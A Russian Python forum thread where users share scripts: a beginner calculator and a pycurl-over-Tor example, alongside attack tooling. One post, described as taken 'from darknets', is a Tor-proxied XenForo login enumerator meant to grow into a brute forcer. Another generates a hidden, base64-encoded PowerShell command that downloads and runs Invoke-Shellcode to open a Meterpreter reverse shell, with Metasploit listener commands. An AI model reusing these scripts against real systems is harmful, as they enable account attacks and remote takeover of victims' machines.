Ваши программы на Python

Тема в разделе "Python", создана пользователем gx6060, 15 окт 2016.

Метки:
  1. gx6060

    gx6060 Python

    Регистрация:
    21 сен 2016
    Сообщения:
    37
    Симпатии:
    32
    В этой теме вы можете размещать свои программы написанные на Python3

    Представлю свой калькулятор написанный еще когда я только начал изучать Python3
    калькулятор имеет 5 видов действий и ничего экстраординарного )
    умножение , деление , сложение , вычитание , степень
    скрипт сохранен в качестве раритета ) и не думаю что будет изменятся
    Код (Python):
    print("Калькулятор")
    print("1)Умножение 2)Деление 3)Сложение 4)Вычитание 5)Степень")
    choose = int(input("Выберите действие "))
    while choose == 1:
        print("Умножение")
        x = int(input("Введите первое число "))
        y = int(input("Введите второе число "))
        z = x * y
        print("Результат", z)
    while choose == 2:
        print("Деление")
        x = int(input("Введите первое число "))
        y = int(input("Введите второе число "))
        z = x / y
        print("Результат", z)
    while choose == 3:
        print("Сложение")
        x = int(input("Введите первое число "))
        y = int(input("Введите второе число "))
        z = x + y
        print("Результат", z)
    while choose == 4:
        print("Вычитание")
        x = int(input("Введите первое число "))
        y = int(input("Введите второе число "))
        z = x - y
        print("Результат", z)
    while choose == 5:
        print("Степень")
        x = int(input("Введите первое число "))
        y = int(input("Введите Степень "))
        z = x ** y
        print("Результат", z)
    calc.py
     
    #1 gx6060, 15 окт 2016
    Последнее редактирование: 15 окт 2016
    Vander и WebWare Team нравится это.
  2. rrrFer

    rrrFer Well-Known Member
    Команда форума C\C++ Team

    Регистрация:
    6 сен 2011
    Сообщения:
    1.324
    Симпатии:
    36
    Все замечательно, но я предлагаю описывать как это работает и код стараться выкладывать не (не только) в файле, но и текстом в сообщении. Все это индексируется и улучшает посещаемость. Описание кода опять же новичкам поможет :).
     
    WebWare Team нравится это.
  3. gx6060

    gx6060 Python

    Регистрация:
    21 сен 2016
    Сообщения:
    37
    Симпатии:
    32
    тогда все лучше под спойлером прятать иначе со временем код будет растягиваться на несколько страниц :)
     
  4. ghost

    ghost penetration testing

    Регистрация:
    12 май 2016
    Сообщения:
    74
    Симпатии:
    64
    Взято из даркнетов.
    Версия Python: 2.7
    Описание:
    Перебор для форумов xenforo. Пока как чекер логинов на существование. Однопотоковый, может кому для изучения полезно будет просто проверить логины,пассы. Если доработать то может стать нормальным брутом. На подобных форумах в новых версиях при трех заходах с одного логина капчу требуют.
    Код (Python):
    #!/usr/bin/env python2
    # coding: utf8

    import requests, re, socks, socket
    import sys

    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
    socket.socket = socks.socksocket

    user_agent = {'User-agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36'}
    cookie = {'xf_session': 'dfb7a7d06d9affbbcc4c0ebe7c7fdf7f', 'cf_captcha':'82659', 'PHPSESSID':'ru13pub7pp3hr6emkin592gna0'}

    def check(url2, logins, log=0):
        url = url2 + '/login/login'
        goods = []

        for i in logins:
            check = None
     
            if log == 1:
                print "Check user - " + i
            r = requests.post(url, data = {'login':i,'register':'0','password':i,'cookie_check':'1'}, headers = user_agent, cookies=cookie)

            try:
                check = re.findall('Неверный пароль', r.content)[0]
            except:
                pass

            if check:
                if log == 1:
                    print "User exist"
                print i
                goods.append(i)
     
        return goods

    def main():
        try:
            url1 = sys.argv[1]
            file2 = sys.argv[2]
     
            o = open(file2,'r')

            users = []
            for i in o:
                i2 = i.rstrip('\r\n')
                users.append(i2)
            o.close()
     
            check(url1, users)
       
        except IndexError:
            print "Неправильные параметры"

        except IOError:
            print "Нет такого файла"

    if __name__ == "__main__":
        main()
     
    #4 ghost, 15 окт 2016
    Последнее редактирование модератором: 15 окт 2016
  5. WebWare Team

    WebWare Team Администратор
    Команда форума

    Регистрация:
    30 дек 2015
    Сообщения:
    201
    Симпатии:
    96
    Не будет ...
     
  6. rrrFer

    rrrFer Well-Known Member
    Команда форума C\C++ Team

    Регистрация:
    6 сен 2011
    Сообщения:
    1.324
    Симпатии:
    36
    Я бы кидал исходники не в тему, а в подраздел. На один исходник - одна тема.
     
    #6 rrrFer, 15 окт 2016
    Последнее редактирование модератором: 15 окт 2016
  7. uzverss

    uzverss New Member

    Регистрация:
    13 окт 2016
    Сообщения:
    2
    Симпатии:
    0
    это скучный калькулятор, обернуть eval(input('> ')) веселее будет, можно не только цифры, но и буквы складывать
    к тому же, такой числовой фокус с ним не проделать: 0.1+0.1+0.1-0.3
     
  8. buzzi

    buzzi Member

    Регистрация:
    19 окт 2016
    Сообщения:
    5
    Симпатии:
    3
    Возможно, кому-нибудь пригодится пример работы связки python + pycurl + TOR.
    Приступаем, и так, в первую очередь нам необходим сам TOR, качаем Expert Bundle и запускаем tor.exe, служба TOR запущена и работает.
    В следующем листинге функция которая будет нам возвращать наш внешний IP, получать его будем с сайта 2ip.ru:
    Код (Python):
    # -*- coding: utf-8 -*-

    import pycurl
    from StringIO import StringIO


    def GetMyIP():
        curl_buffer = StringIO() # Создаем объект буфера куда будет записываться результат запроса
        curl_obj = pycurl.Curl() # Создаем pycurl-объект
        curl_obj.setopt(pycurl.URL, "2ip.ru") # Настройка объекта "куда бежать"
        curl_obj.setopt(pycurl.WRITEDATA, curl_buffer) # теперь указываем куда пишем ответ от сервера
        curl_obj.setopt(pycurl.PROXY, '127.0.0.1') # заворачиваем прокси на себя
        curl_obj.setopt(pycurl.PROXYPORT, 9050) # и указываем порт для подключения к нему
        curl_obj.setopt(pycurl.PROXYTYPE, pycurl.PROXYTYPE_SOCKS5) # задаем тип прокси
        try:
            curl_obj.perform() # Подготовка и отправка запроса
            curl_obj.close()   # Закрытие curl-объекта
            body = curl_buffer.getvalue()  # Получаем строку с ответом от сервера из буфера
            for line in body.split('\n'):  # Ищем строку в HTML-коде страницы в которой указан наш адрес
                if 'clip.setText' in line:
                    return(line.strip().replace('clip.setText', 'Наш текущий IP - '))
        except pycurl.error:   # Отлавливаем ошибки соединения
            curl_obj.close()   # В любом случае нужно закрыть curl-объект
            return("Возникла ошибка при попытке соединения...")
    Сервис переодически будет обновлять цепочку, но если вы хотите обновлять ее чаще вам придется, естественно, перезапускать процесс tor.exe
    С этой нелегкой и муторной задачей нам поможет модуль subprocess.
    Следующий листинг - функция, которая убивает запущенный процесс и запускает его заново:
    Код (Python):
    import subprocess
    from time import sleep


    def tor_restart():
        subprocess.Popen('taskkill /f /FI "IMAGENAME eq tor.exe"') # передаем в коммандную строку команду убить процесс с именем tor.exe
        sleep(0.5)                                                 # ждем 500 мс до полной остановки процесса
        subprocess.Popen(ptch_to_torexe)                           # запускаем заново процесс      
     
    gx6060 нравится это.
  9. ~~DarkNode~~

    ~~DarkNode~~ Well-Known Member
    Команда форума

    Регистрация:
    19 окт 2016
    Сообщения:
    85
    Симпатии:
    117
    PowerMeter script [Python2.7]
    Набросал простенький скриптец на питоне
    Генерирует однострочную команду для PowerShell в Bas64 кодировке используя Invoke-Shellcode от PowerSploit для получения метерпретер сессии)
    Код (Python):
    #!/usr/bin/python2.7
    # -*- coding: utf-8 -*-


    import re
    import base64
    from termcolor import colored


    def banner():
        print colored("""
    ===============================================================================

    #####                          #######           #     #                    
    #     #  ####  #####  #####     #     # ######    #     #   ##    ####  #    #
    #       #    # #    # #    #    #     # #         #     #  #  #  #    # #   #
    #       #    # #    # #    #    #     # #####     ####### #    # #      ####  
    #       #    # #####  #####     #     # #         #     # ###### #      #  #  
    #     # #    # #   #  #         #     # #         #     # #    # #    # #   #
    #####   ####  #    # #         ####### #         #     # #    #  ####  #    #
                                                                                 
               ____                             __  __      _          
              |  _ \ _____      _____ _ __     |  \/  | ___| |_ ___ _ __
              | |_) / _ \ \ /\ / / _ \ '__|____| |\/| |/ _ \ __/ _ \ '__|
              |  __/ (_) \ V  V /  __/ | |_____| |  | |  __/ ||  __/ |  
              |_|   \___/ \_/\_/ \___|_|       |_|  |_|\___|\__\___|_|  
                                                                       



       
    Powershell_Meter script  is a PowerShell Command Generator.
    Written by [Mister Bert0ni|DarkNode] <Corp Of Hack Team> <Wired Hawks Team> <CodeBy Team>
    [[Contacts]] ::: <https://new.vk.com/byhackers>
    [[YouTube]]  ::: <https://www.youtube.com/c/CorpOfHack>
    ===============================================================================
    """
    ,"cyan")
       

    def powershell_encode(data):
        # blank command will store our fixed unicode variable
        blank_command = ""
        powershell_command = ""
        # Remove weird chars that could have been added by ISE
        n = re.compile(u'(\xef|\xbb|\xbf)')
        # loop through each character and insert null byte
        for char in (n.sub("", data)):
            # insert the nullbyte
            blank_command += char + "\x00"
        # assign powershell command as the new one
        powershell_command = blank_command
        # base64 encode the powershell command
        powershell_command = base64.b64encode(powershell_command)
        return powershell_command


    def metasploit():
        print colored("[*]PowerShell генератор для Metasploit-Framework с ипользованиевм PowerSploit.","yellow")
        print colored("Оригинал можно взять здесь:","green")+ colored("https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1\n\n","cyan")
        ans_lhost = raw_input("Введите IP адрес атакующей машины(LHOST): ")
        ans_lport = raw_input("Введите Порт листенера атакуещей машины(LPORT): ")
     
        print colored("\n[*]Наша команда для PowerShell:","yellow")
        x = powershell_encode("IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost "+ans_lhost+" -Lport "+ans_lport+" -Force")
        print colored("powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc " + x,"red")
        print colored("\n[*]Команды для metasploit-framework(Вы можете сохранить эту последовательность команд в файл listener.rc и запустить msfconsole -r listener.rc или же прямо из запущеной консоли метаслоита: resourse listener.rc","yellow")
        print colored("use multi/handler \nset payload windows/meterpreter/reverse_https \nset LHOST " + ans_lhost + "\nset LPORT " + ans_lport + "\nset ExitOnSession false \nexploit -j","green")

    banner()
    metasploit()
     

     
Загрузка...

Поделиться этой страницей